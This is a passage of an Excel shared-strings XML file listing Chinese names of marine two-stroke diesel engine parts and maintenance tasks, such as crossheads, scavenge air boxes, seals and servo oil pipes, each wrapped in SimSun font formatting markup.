        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>异径螺套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>异径接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>警示牌</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>参考表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节导套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节杆组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调节阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄压管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架防爆门</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃烧室泄压阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全阀壳体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气安全阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>再润滑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥控</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>遥测温度计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承盖的拆卸和安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆的拆卸和安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头的拆卸和安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头拆卸和安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承盖的拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴瓦的拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆的拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖吊装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测量报告</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电阻</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主轴承定位工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动夹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>两半管夹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>止动器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴外壳</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锁紧螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>孔用挡圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴用挡圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承固定工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头轴承固定工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸润滑油回油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>回流管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>肋板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外肋板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞支架环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环形管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环形支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三段式环支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铜套环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>沉头铆钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆头铆钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力试棒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆用密封圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆提升检查</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导块组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮吊装工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮销</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>卷绳滚筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转动设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转翼</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆钢</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝绳圆夹头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢丝绳圆夹</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆橡胶圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无缝圆橡胶圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆形吊带</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头橡胶垫</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶垫片</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶保护</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>试航磨合大纲</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>台架试验磨合大纲</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>鞍性板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保险栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保险杠</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安全板</t>
    </r>
  </si>
  <si>
    <r>
      <t>SAM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>联接板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气排放系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱与排气侧管路</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气室排放管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气空气</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器后扫气管道</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器前扫气管道</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>集气瓶</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱安装件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱装配组件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱加工</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱废气门</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>三半刮油环</t>
    </r>
  </si>
  <si>
    <r>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>段式刮油环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向刮环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞杆螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺杆</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺纹套筒</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通接头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺钉固定套</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封圈（套）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀空气管密封</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封空气管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封法兰</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封塞</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带保护圈的密封环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带保护圈密封环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无缝钢管（出证）</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器支座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>坐垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>海水冷却系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>二次力矩补偿器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑楔块紧固</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力块座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扇形密封环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自粘标签</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不干胶标签</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自锁螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自攻螺钉</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半导体</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>敏感部件清单</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器适配器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器清洁液</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器废热再利用传感器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿形止动垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务平台</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油脉冲支管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油泄漏管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
